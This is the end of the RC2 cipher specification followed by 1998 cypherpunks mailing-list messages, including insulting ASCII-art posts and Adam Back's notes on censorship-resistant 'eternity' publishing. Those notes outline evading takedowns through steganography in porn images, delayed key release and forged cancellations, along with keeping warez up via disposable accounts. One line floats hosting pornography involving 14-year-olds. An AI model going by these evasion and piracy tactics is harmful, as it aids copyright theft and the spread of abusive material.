T in the range 1 <= T <= 128. (Our current implementation uses T
= 8.) However, regardless of T, the algorithm has a maximum
effective key length in bits, denoted T1. That is, the search
space is 2^(8*T), or 2^T1, whichever is smaller.

The purpose of the key-expansion algorithm is to modify the key
buffer so that each bit of the expanded key depends in a
complicated way on every bit of the supplied input key.

The key expansion algorithm begins by placing the supplied T-byte
key into bytes L[0], ..., L[T-1] of the key buffer.

The key expansion algorithm then computes the effective key
length in bytes T8 and a mask TM based on the effective key
length in bits T1. It uses the following operations:

T8 = (T1+7)/8;
TM = 255 MOD 2^(8 + T1 - 8*T8);

Thus TM has its 8 - (8*T8 - T1) least significant bits set.

For example, with an effective key length of 64 bits, T1 = 64,
T8 = 8 and TM = 0xff.  With an effective key length of 63 bits,
T1 = 63, T8 = 8 and TM = 0x7f.

Here PITABLE[0], ..., PITABLE[255] is an array of "random" bytes
based on the digits of PI = 3.14159... . More precisely, the 
array PITABLE is a random permutation of the values 0, ..., 255. 
Here is the PITABLE in hexadecimal notation:

     0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f
00: d9 78 f9 c4 19 dd b5 ed 28 e9 fd 79 4a a0 d8 9d
10: c6 7e 37 83 2b 76 53 8e 62 4c 64 88 44 8b fb a2
20: 17 9a 59 f5 87 b3 4f 13 61 45 6d 8d 09 81 7d 32
30: bd 8f 40 eb 86 b7 7b 0b f0 95 21 22 5c 6b 4e 82
40: 54 d6 65 93 ce 60 b2 1c 73 56 c0 14 a7 8c f1 dc
50: 12 75 ca 1f 3b be e4 d1 42 3d d4 30 a3 3c b6 26
60: 6f bf 0e da 46 69 07 57 27 f2 1d 9b bc 94 43 03
70: f8 11 c7 f6 90 ef 3e e7 06 c3 d5 2f c8 66 1e d7
80: 08 e8 ea de 80 52 ee f7 84 aa 72 ac 35 4d 6a 2a
90: 96 1a d2 71 5a 15 49 74 4b 9f d0 5e 04 18 a4 ec
a0: c2 e0 41 6e 0f 51 cb cc 24 91 af 50 a1 f4 70 39
b0: 99 7c 3a 85 23 b8 b4 7a fc 02 36 5b 25 55 97 31
c0: 2d 5d fa 98 e3 8a 92 ae 05 df 29 10 67 6c ba c9
d0: d3 00 e6 cf e1 9e a8 2c 63 16 01 3f 58 e2 89 a9
e0: 0d 38 34 1b ab 33 ff b0 bb 48 0c 5f b9 b1 cd 2e
f0: c5 f3 db 47 e5 a5 9c 77 0a a6 20 68 fe 7f c1 ad

The key expansion operation consists of the following two loops
and intermediate step:

for i = T, T+1, ..., 127 do
  L[i] = PITABLE[L[i-1] + L[i-T]];

L[128-T8] = PITABLE[L[128-T8] & TM];

for i = 127-T8, ..., 0 do
  L[i] = PITABLE[L[i+1] XOR L[i+T8]];

(In the first loop, the addition of L[i-1] and L[i-T] is
performed modulo 256.)

The "effective key" consists of the values L[128-T8],..., L[127].
The intermediate step's bitwise "and" operation reduces the
search space for L[128-T8] so that the effective number of key
bits is T1. The expanded key depends only on the effective key
bits, regardless of the supplied key K. Since the expanded key is
not itself modified during encryption or decryption, as a
pragmatic matter one can expand the key just once when encrypting
or decrypting a large block of data.


3. Encryption algorithm

The encryption operation is defined in terms of primitive "mix"
and "mash" operations.

Here the expression "x rol k" denotes the 16-bit word x rotated
left by k bits, with the bits shifted out the top end entering
the bottom end.

3.1 Mix up R[i]

The primitive "Mix up R[i]" operation is defined as follows,
where s[0] is 1, s[1] is 2, s[2] is 3, and s[3] is 5, and where
the indices of the array R are always to be considered "modulo
4," so that R[i-1] refers to R[3] if i is 0 (these values are

"wrapped around" so that R always has a subscript in the range 0
to 3 inclusive):

R[i] = R[i] + K[j] + (R[i-1] & R[i-2]) + ((~R[i-1]) & R[i-3]);
j = j + 1;
R[i] = R[i] rol s[i];

In words: The next key word K[j] is added to R[i], and j is
advanced. Then R[i-1] is used to create a "composite" word which
is added to R[i]. The composite word is identical with R[i-2] in
those positions where R[i-1] is one, and identical to R[i-3] in
those positions where R[i-1] is zero. Then R[i] is rotated left
by s[i] bits (bits rotated out the left end of R[i] are brought
back in at the right). Here j is a "global" variable so that K[j]
is always the first key word in the expanded key which has not
yet been used in a "mix" operation.

3.2 Mixing round

A "mixing round" consists of the following operations:

Mix up R[0]
Mix up R[1]
Mix up R[2]
Mix up R[3]

3.3 Mash R[i]

The primitive "Mash R[i]" operation is defined as follows (using
the previous conventions regarding subscripts for R):

R[i] = R[i] + K[R[i-1] & 63];

In words: R[i] is "mashed" by adding to it one of the words of
the expanded key. The key word to be used is determined by
looking at the low-order six bits of R[i-1], and using that as an
index into the key array K.

3.4 Mashing round

A "mashing round" consists of:

Mash R[0]
Mash R[1]
Mash R[2]
Mash R[3]

3.5 Encryption operation

The entire encryption operation can now be described as follows. 
Here j is a global integer variable which is affected by the
mixing operations.

     1. Initialize words R[0], ..., R[3] to contain the 
        64-bit input value.

     2. Expand the key, so that words K[0], ..., K[63] become
        defined.

     3. Initialize j to zero.

     4. Perform five mixing rounds.

     5. Perform one mashing round.

     6. Perform six mixing rounds.

     7. Perform one mashing round.

     8. Perform five mixing rounds.

Note that each mixing round uses four key words, and that there
are 16 mixing rounds altogether, so that each key word is used
exactly once in a mixing round. The mashing rounds will refer to
up to eight of the key words in a data-dependent manner. (There
may be repetitions, and the actual set of words referred to will
vary from encryption to encryption.)

4. Decryption algorithm

The decryption operation is defined in terms of primitive 
operations that undo the "mix" and "mash" operations of the 
encryption algorithm. They are named "r-mix" and "r-mash" 
(r- denotes the reverse operation).

Here the expression "x ror k" denotes the 16-bit word x rotated
right by k bits, with the bits shifted out the bottom end 
entering the top end.

4.1 R-Mix up R[i]

The primitive "R-Mix up R[i]" operation is defined as follows,
where s[0] is 1, s[1] is 2, s[2] is 3, and s[3] is 5, and where
the indices of the array R are always to be considered "modulo
4," so that R[i-1] refers to R[3] if i is 0 (these values are
"wrapped around" so that R always has a subscript in the range 0
to 3 inclusive):

R[i] = R[i] ror s[i];
R[i] = R[i] - K[j] - (R[i-1] & R[i-2]) - ((~R[i-1]) & R[i-3]);
j = j - 1;

In words: R[i] is rotated right
by s[i] bits (bits rotated out the right end of R[i] are brought
back in at the left). Here j is a "global" variable so that K[j]
is always the key word with greatest index in the expanded key 
which has not yet been used in a "r-mix" operation. The key word 
K[j] is subtracted from R[i], and j is decremented. R[i-1] is 
used to create a "composite" word which is subtracted from R[i]. 
The composite word is identical with R[i-2] in those positions 
where R[i-1] is one, and identical to R[i-3] in those positions 
where R[i-1] is zero. 

4.2 R-Mixing round

An "r-mixing round" consists of the following operations:

R-Mix up R[3]
R-Mix up R[2]
R-Mix up R[1]
R-Mix up R[0]

4.3 R-Mash R[i]

The primitive "R-Mash R[i]" operation is defined as follows 
(using the previous conventions regarding subscripts for R):

R[i] = R[i] - K[R[i-1] & 63];

In words: R[i] is "r-mashed" by subtracting from it one of the 
words of the expanded key. The key word to be used is determined 
by looking at the low-order six bits of R[i-1], and using that as
an index into the key array K.

4.4 R-Mashing round

An "r-mashing round" consists of:

R-Mash R[3]
R-Mash R[2]
R-Mash R[1]
R-Mash R[0]

4.5 Decryption operation

The entire decryption operation can now be described as follows.
Here j is a global integer variable which is affected by the
mixing operations.

     1. Initialize words R[0], ..., R[3] to contain the 64-bit 
        ciphertext value.

     2. Expand the key, so that words K[0], ..., K[63] become
        defined.

     3. Initialize j to 63.

     4. Perform five r-mixing rounds.

     5. Perform one r-mashing round.

     6. Perform six r-mixing rounds.

     7. Perform one r-mashing round.

     8. Perform five r-mixing rounds.


5. Test vectors

Test vectors for encryption with RC2 are provided below. 
All quantities are given in hexadecimal notation.

Key length (bytes) = 8
Effective key length (bits) = 63
Key = 00000000 00000000
Plaintext = 00000000 00000000
Ciphertext = ebb773f9 93278eff

Key length (bytes) = 8
Effective key length (bits) = 64
Key = ffffffff ffffffff
Plaintext = ffffffff ffffffff
Ciphertext = 278b27e4 2e2f0d49

Key length (bytes) = 8
Effective key length (bits) = 64
Key = 30000000 00000000
Plaintext = 10000000 00000001
Ciphertext = 30649edf 9be7d2c2

Key length (bytes) = 1
Effective key length (bits) = 64
Key = 88
Plaintext = 00000000 00000000
Ciphertext = 61a8a244 adacccf0

Key length (bytes) = 7
Effective key length (bits) = 64
Key = 88bca90e 90875a
Plaintext = 00000000 00000000
Ciphertext = 6ccf4308 974c267f

Key length (bytes) = 16
Effective key length (bits) = 64
Key = 88bca90e 90875a7f 0f79c384 627bafb2
Plaintext = 00000000 00000000
Ciphertext = 1a807d27 2bbe5db1

Key length (bytes) = 16
Effective key length (bits) = 128
Key = 88bca90e 90875a7f 0f79c384 627bafb2
Plaintext = 00000000 00000000
Ciphertext = 2269552a b0f85ca6

Key length (bytes) = 33
Effective key length (bits) = 129
Key = 88bca90e 90875a7f 0f79c384 627bafb2 16f80a6f 85920584 
      c42fceb0 be255daf 1e
Plaintext = 00000000 00000000
Ciphertext = 5b78d3a4 3dfff1f1


6. RC2 Algorithm Object Identifier


The Object Identifier for RC2 in cipher block chaining mode is

rc2CBC OBJECT IDENTIFIER
  ::= {iso(1) member-body(2) US(840) rsadsi(113549)
       encryptionAlgorithm(3) 2}

RC2-CBC takes parameters

RC2-CBCParameter ::= CHOICE {
  iv IV,
  params SEQUENCE {
    version RC2Version,
    iv IV
  }
}

where

IV ::= OCTET STRING -- 8 octets
RC2Version ::= INTEGER -- 1-1024

RC2 in CBC mode has two parameters: an 8-byte initialization 
vector (IV) and a version number in the range 1-1024 which 
specifies in a roundabout manner the number of effective key bits 
to be used for the RC2 encryption/decryption.

The correspondence between effective key bits and version number 
is as follows:

1. If the number EKB of effective key bits is in the range 1-255, 
   then the version number is given by Table[EKB], where the 
   256-byte translation table Table[] is specified below.  
   Table[] specifies a permutation on the numbers 0-255; note 
   that it is not the same table that appears in the key 
   expansion phase of RC2.

2. If the number EKB of effective key bits is in the range 
   256-1024, then the version number is simply EKB.

   The default number of effective key bits for RC2 is 32.  
   If RC2-CBC is being performed with 32 effective key bits, the 
   parameters should be supplied as a simple IV, rather than as a 
   SEQUENCE containing a version and an IV.


     0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f

00: bd 56 ea f2 a2 f1 ac 2a b0 93 d1 9c 1b 33 fd d0
10: 30 04 b6 dc 7d df 32 4b f7 cb 45 9b 31 bb 21 5a
20: 41 9f e1 d9 4a 4d 9e da a0 68 2c c3 27 5f 80 36
30: 3e ee fb 95 1a fe ce a8 34 a9 13 f0 a6 3f d8 0c
40: 78 24 af 23 52 c1 67 17 f5 66 90 e7 e8 07 b8 60
50: 48 e6 1e 53 f3 92 a4 72 8c 08 15 6e 86 00 84 fa
60: f4 7f 8a 42 19 f6 db cd 14 8d 50 12 ba 3c 06 4e
70: ec b3 35 11 a1 88 8e 2b 94 99 b7 71 74 d3 e4 bf
80: 3a de 96 0e bc 0a ed 77 fc 37 6b 03 79 89 62 c6
90: d7 c0 d2 7c 6a 8b 22 a3 5b 05 5d 02 75 d5 61 e3
a0: 18 8f 55 51 ad 1f 0b 5e 85 e5 c2 57 63 ca 3d 6c
b0: b4 c5 cc 70 b2 91 59 0d 47 20 c8 4f 58 e0 01 e2
c0: 16 38 c4 6f 3b 0f 65 46 be 7e 2d 7b 82 f9 40 b5
d0: 1d 73 f8 eb 26 c7 87 97 25 54 b1 28 aa 98 9d a5
e0: 64 6d 7a d4 10 81 44 ef 49 d6 ae 2e dd 76 5c 2f
f0: a7 1c c9 09 69 9a 83 cf 29 39 b9 e9 4c ff 43 ab

A. Intellectual Property Notice

RC2 is a registered trademark of RSA Data Security, Inc. RSA's
copyrighted RC2 software is available under license from RSA
Data Security, Inc.


B. Author's Address

Ron Rivest
RSA Laboratories
100 Marine Parkway, #500      
Redwood City, CA  94065  USA  
(650) 595-7703
rsa-labs@rsa.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 14:31:19 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: MS presents technical defence [CNN]
Message-ID: <199801130659.AAA26115@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                 MICROSOFT TO PRESENT LENGTHY TECHNICAL DEFENSE
>                                        
>      graphic January 12, 1998
>      Web posted at: 11:14 p.m. EST (0414 GMT)
>      
>      WASHINGTON (AP) -- Microsoft Corp., attempting to fend off contempt
>      of court charges, plans to make a detailed defense in court that its
>      Internet Explorer software is interwoven with its popular Windows 95
>      program and the two can't be separated without debilitating the
>      Windows program.
>      
>      Attorneys for Microsoft and the Justice Department are scheduled to
>      face off in federal court again Tuesday in the latest chapter of the
>      bitter antitrust lawsuit. The Justice Department has asked U.S.
>      District Judge Thomas Penfield Jackson to find Microsoft in contempt
>      of his December 11 order that it separate its Internet browser
>      software from Windows.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Tue, 13 Jan 1998 15:11:42 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: Feds to Idaho: Kiss Our Butts
In-Reply-To: <199801130255.UAA21084@wire.insync.net>
Message-ID: <Pine.GSO.3.95.980113020151.26748B-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 12 Jan 1998, Eric Cordian wrote:

> 
> The manslaughter case against Ruby Ridge shooter Lon Horiuchi was
> effectively neutered today when a federal judge acquiesed to demands
> by Justice Department lawyers and moved the case out of Idaho's
> jurisdiction and into federal court.  This means that Horiuchi will be
> tried in federal court in front of a federal jury on state
> manslaughter charges, and not in front of a jury from Idaho's Boundary
> County, where the shooting took place.

I thought the people in our governmnet didn't really think things through
before...  Now I know they don't even think.  

>From a purely pragmatic point of view, they should have realized that only
a trial without any hint of federal interference had any hope of reducing
the growing distrist of government.  Even though the whole Ruby Ridge
incident stinks, you'd think they'd at least have the brains to do proper
damage control.

Though, a conviction would certainly shock this country a little bit,
wouldn't it?


Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Tue, 13 Jan 1998 17:33:04 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Accounts payable
In-Reply-To: <199801090607.HAA01799@basement.replay.com>
Message-ID: <Pine.A41.3.95.980113020738.40334A-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 9 Jan 1998, Anonymous wrote:

I think Vulis needs each of us to send ten copies of this back to him.

> Timmy C[rook] May is just a poor excuse for an unschooled, retarded thug.
> 
>          (_) _____ (_)
>             /O   O\   Timmy C[rook] May
>            !   I   !
>            ! \___/ !
>             \_____/
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Tue, 13 Jan 1998 17:14:41 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Cute
In-Reply-To: <199801091520.QAA29876@basement.replay.com>
Message-ID: <Pine.A41.3.95.980113020829.40334B-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 9 Jan 1998, Anonymous wrote:

I think Vulis needs each of us to send ten copies of this back to him.

> Tim May is cute and cuddly!
> 
>          (_) _____ (_)
>             /O   O\   Timmy C[uddly] May
>            !   I   !
>            ! \___/ !
>             \_____/
> 
> 
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 13 Jan 1998 11:19:07 +0800
To: thomas.womack@merton.oxford.ac.uk
Subject: Re: local vs remote eternity servers (Re: (eternity) Traffic Analysis)
In-Reply-To: <01bd1fad$24885680$409001a3@mc64.merton.ox.ac.uk>
Message-ID: <199801130215.CAA00351@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Thomas Womack <thomas.womack@merton.oxford.ac.uk> writes:
> >Thomas Womack <thomas.womack@merton.oxford.ac.uk> writes:
> >> I can imagine *use* of
> >> the service becoming a felony; you're therefore committing a felony
> >> merely by connecting to http://www.eternity.to, and acquiring
> >> evidence for that is a trivial matter of logging connections from a
> >> given user.
> >
> >One solution is to run eternity on a web server with SSL turned on,
> >and which serves lots of other data too.
> 
> It's not completely clear that such an object would exist; in legal terms,
> it would seem to be the same as a large and well-respected department store
> which happens to possess and tolerate a fence for stolen property. That is,
> it's an object which handles stolen property and can be shouted at loudly,
> legally, and with very large sticks.

Yes, but merely being seen going into this department store is you
hope not grounds for prosecution.  

ie The flow of the discussion being that you said "you're therefore
committing a felony by connecting to www.eternity.to" .. my reply
being that if we can arrange that there are any number of reasons for
connecting to www.eternity.to, any of which are protected by an SSL
connection, that this lessens the risks of being seen connecting to
said server.  We can easily arrange this by offering interesting free
services.

Certainly turning on SSL does not protect the server operator.  There
server operator in your analogy was the department store owner.  But
we were discussing the client (the shopper)'s risks.

> >The general problem with the remote server approach is that you have
> >to trust the server.  You could alternatively use a local eternity
> >server, which is easy to do if you have a local unix machine.
> 
> The operating system is immaterial here!

Ah, not if you are talking about my eternity prototype, because it 
only works on the unix platform.  Same for Ryan at present I think.
The overloading of "eternity service" is not helping here.

My point was that talking about my eternity prototype using USENET as
a distribution medium, where the `eternity server' is just a
convenient way to present an apparently persistent view of transient
USENET articles, using a local eternity server reduces the risk of
traffic analysis attack.  Now all you are doing is reading news.  If
you already have a full USENET feed, you have no new externally
observable traffic.

This process would be better termed a `local eternity proxy', in that
it would effectively be acting as a local web proxy process, where the
eternity virtual web pages were being fetched from a local news spool
by the local web proxy.

> >Ideally you would like a local news feed also, so that your local
> >eternity servers NNTP traffic or file system accesses to read news are
> >not available to the attacker.
> 
> That nearly makes sense - but 'running a news feed including the eternal.*
> groups' can be phrased such that any sane jury takes it as 'using/running an
> eternity server'.

Cross-post, and / or post to random newsgroups, threshold secret split
your posts so that only N of M are required to reconstruct.  If you
get shouted at for SPAM, steganographically encode the eternity
traffic.  Pornographic images in alt.binaries.* would be suitable
because there are lots of those already.  Because this is a publically
readable message an attacker (such as Ryan's system admin he mentioned
at MIT) might recognize the message based on successful stego
decoding, and purge it from the news feed.  We can counter this move
by encrypting the original posting, and posting the decryption key a
day or two later to ensure we get the full feed before anti-eternity
crusaders get to work purging the eternity traffic masquerading as
images.

USENET carries all sorts of materials which could potentially get you
in trouble.  I don't know what your news feed is like, but the one at
Exeter last time I looked had a healthy selection of dodgy gifs in
alt.binaries.*

> >Depending on your available resources, you can either operate from a
> >local news feed (people are less likely to be prosecuted for the
> >contents of a normal full newsfeed IMO), or have SSL access to a
> >remote ISPs NNTP server.
> 
> I suspect that, had anyone the least intention of arresting certain of my
> acquaintances on a trumped-up charge, they could persuade a jury that a
> 'normal' full newsfeed is sanitised, and that a newsfeed containing *warez*
> or *erotica* is clearly an Evil Perversion of the Natural Law.

We can't do much about the idiotic juries, and corrupt judicial
systems ... `they'd indict a ham sandwich if I told them to' -- some
US judge.  You're probably right too.  But I think we need to keep a
sense of proportion about opening ourselves to having technical
actions misconstrued to a clueless jury: there are easier ways to
frame someone once they have decided they don't like you.

To truly retain plausible deniability you need to maintain excellent
plausible deniability, you have to be squeaky clean: you need to
appear to be a model citizen, to not post politically incorrect
opinions to non-government approved fora, etc.  You must be below the
radar belt, you must be essentially invisible to the government, the
spooks dossier on you must read Mr Average and be entirely wholesome.
Then you must have one or more alter-egos, for your real interests.

> >> How can you defend against the felonisation of 'operating an Eternity
> >> Server'?
> >
> >Operate closed eternity servers for small group only, or a local
> >server for yourself or local users only.
> 
> But wasn't the point of the eternity service that it was massively
> distributed; if you're running a server for a small group consisting of
> forty-nine hackers and the deputy director of the NSA going incognito,
> you'll suddenly discover that all your servers have been seized, and that
> men with intimidating glasses want to ask you a number of searching
> questions.

The surest way is to run the eternity server for yourself only.  The
distribution medium is massively distributed, as the distribution
medium is USENET.  USENET is a broadcast medium.  Possibly the most
secure way to create one way anonymous communications is to broadcast
the messages.  Tim May's BlackNet uses this approach.  Eternity is
doing the same thing.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Tue, 13 Jan 1998 17:40:57 +0800
To: Mix <mixmaster@remail.obscura.com>
Subject: Re: your mail
In-Reply-To: <199801111151.DAA14980@sirius.infonex.com>
Message-ID: <Pine.A41.3.95.980113022102.40334D-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 11 Jan 1998, Mix wrote:

I think Vulis needs each of us to send ten copies of this back to him.

> Timmy C. Maypole is a pimply dweeb sitting at a computer 
> chortling at his own imagined cleverness.
> 
>               (/T\)  _____                     (/V\)
>               (-,-) ()====) .  +  .   .    +   ('.') Timmy C. Maypole
>               \(o)/   -|3 .     .   .       .  J\~/L
>              /='
>         ,OOO//|   |    .+   .   <%%%%%%%%%%%O >|<  \ooo,
>         O:O:O LLLLL + .  .   .     .     I  .  //|\\ o:0:o
>         \OOO/ || ||     .  .   .      +     .  ~|~|~ \ooo/
>              C_) (_D                           _I I_
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 13 Jan 1998 11:18:48 +0800
To: tcmay@got.net
Subject: steganography and delayed release of keys (Re: Eternity Services)
In-Reply-To: <v03102801b0df03d95cd4@[207.167.93.63]>
Message-ID: <199801130246.CAA00384@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net> writes:
> News spool services are already showing signs of getting into this "Usenet
> censorship" business in a bigger way. Some news spool services honor
> cancellations (and some don't).  Some don't carry the "sensitive"
> newsgroups. And so on. Nothing in their setup really exempts them from
> child porn prosecutions--no more so than a bookstore or video store is
> exempted, as the various busts of bookstores and whatnot show, including
> the "Tin Drum" video rental case in Oklahoma City.

One tactic which could protect a USENET newsgroup operator from child
porn prosecutions is if he had no practical way to recognize such
materials until after it was distributed to down stream sites.

Using steganography, we could for example adopt a strategy such as
this:

1) Cross-post, and / or post to random newsgroups 

2) Threshold secret split your posts so that only N of M are required
   to reconstruct.

3) steganographically encode the eternity traffic.  Pornographic images
   in alt.binaries.* would be suitable because there are lots of those
   already.  

4) Encrypt the original steganographically encoded posting (encrypt
   the eternity document and hide it inside the image file posted)

5) Post the decryption key a day or two later to ensure we get the full
   feed before a censor can recognize the traffic

The attacker is now forced to delay USENET posts until the key is
posted if he wishes to censor eternity articles.

Measures 1) and 2) address the problems with newsgroups not being
carried everywhere.  2) improves reliability as distribution can be
patchy.

Cancellations can be discouraged by liberal abuse of cancellation
forgeries, which a Dimitri Vulis aided greatly by providing easy to
use cancel bot software.

A worrying trend is the use of NoCeMs to filter whole news feeds,
where the NoCeM rating system I considered was designed for third
party ratings applied by individuals.  NoCeMs could become a negative
if used in this way, because news admins may use them as a tool to
censor large parts of the USENET distribution, in too centralised a
way.

> >The solution I am using is to keep reposting articles via remailers.
> >Have agents which you pay to repost.  This presents the illusion of
> 
> This of course doesn't scale at all well. It is semi-OK for a tiny, sparse
> set of reposted items, but fails utterly for larger database sets. (If and
> when Adam's reposted volumes begin to get significant, he will be viewed as
> a spammer. :-) )

The best criticism of my eternity design to date!  I agree.

But this limitation is difficult to avoid while retaining the level of
availability.  Trade offs improving efficiency will tend to move away
from an existing widespread broadcast medium (USENET) towards
specialised protocols, and pull technology (the web hosting model),
leading to actual machines serving materials.

We can probably arrange that these servers do not know what they are
serving, however if the whole protocol is setup specifically for the
purpose of building an eternity service, it will be shut down.

Longer term perhaps something could be achieved in slowly building up
to larger numbers of servers, but this does not seem such a
main-stream service that it would be easy to get this degree of
uptake.

That is to say this problem is more than designing protocols which
would be resilient _if_ they were installed on 10,000 servers around
the world; the problem is as much to do with coming up with a
plausible plan to deploy those servers.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 13 Jan 1998 11:19:24 +0800
To: eternity@internexus.net
Subject: mirroring services, web accounts for ecash
Message-ID: <199801130314.DAA00409@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Some meta-level thoughts on the eternity service document availability
problem:

Many of the problems with designing an eternity service are introduced
by trying to build real time accessibility of data (with similar
response times for documents to those offered by web servers).

The BlackNet model can quite ably provide eternity like services with
perhaps 24 hour turn around on documents.  Everything is operated by
digital dead drop (via say news:alt.anonymous.messages), or mixmaster
remailers.

This suggests that another approach would be to have two classes of
services.  Users of high risk documents can put up with 24 hour turn
around, and lower risk documents can be served by an alternate
service, intermediate risk documents can exist by using low risk
resources until detection.

The low risk document service could be just an automated mirroring
service, and could for example explicitly state that illegal materials
in server localities will be removed on the server operator becoming
aware of this fact, or perhaps on receipt of court notification.  This
presents the kind of "we aim to discourage illegal materials" persona
that commercial ISPs like to present to the police and spooks.

It might also be useful to partially automate the differences in types
of material which can be hosted in various jurisdictions.

Scandinavian countries might be used for pornography in the 14 - 21
year old range; other jurisdictions useful for copyright music
materials, where music royalties are collected by a blank media tax;
the US might be useful for publication of materials critical of
Islamic beliefs, and so on, in each case the materials being strictly
legal in the server locality.

The mirroring service could be offered by mirror site operators as a
public service for locally controversial materials, or services could
be charged for to improve long term availability.

If the mirroring service is automated, it is likely that materials
will slip through the gaps in the system (especially if it is designed
with this property in mind), much like warez used to be traded in
funny named directories on badly configured ftp servers, or world read
and writeable ftp incoming directories.

The operator says "darn warez pirates" and removes the offending warez
when he is notified.  But it might stay up for a few weeks, and URLs
spread quickly, and there are lots of open access sites.


Another less controversial "host" service which warez pirates might be
likely to get away with abusing would be simple web space available
for ecash.  Lance Cottrell already offers this such anonymous web
accounts.  If many ISPs start offering this kind of service, the
pirates will be more easily able to keep going by hopping from account
to account, as accounts are closed for breach of policy, in a similar
way that spammers treat accounts as disposable.


A TAZ server could even offer a persistent virtual URL to a migrating
warez file collection located either on mirroring sites, or on
anonymous ecash paid web accounts.  (TAZ servers just offer a layer of
indirection, see Ian Goldberg and Dave Wagner's paper:

	http://www.cs.berkeley.edu/~daw/cs268/

)

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 13 Jan 1998 13:17:11 +0800
To: cypherpunks@toad.com
Subject: Re: Talk of Banning Research into Human Cloning
In-Reply-To: <v03102800b0e02a107673@[207.167.93.63]>
Message-ID: <199801130510.GAA26649@basement.replay.com>
MIME-Version: 1.0
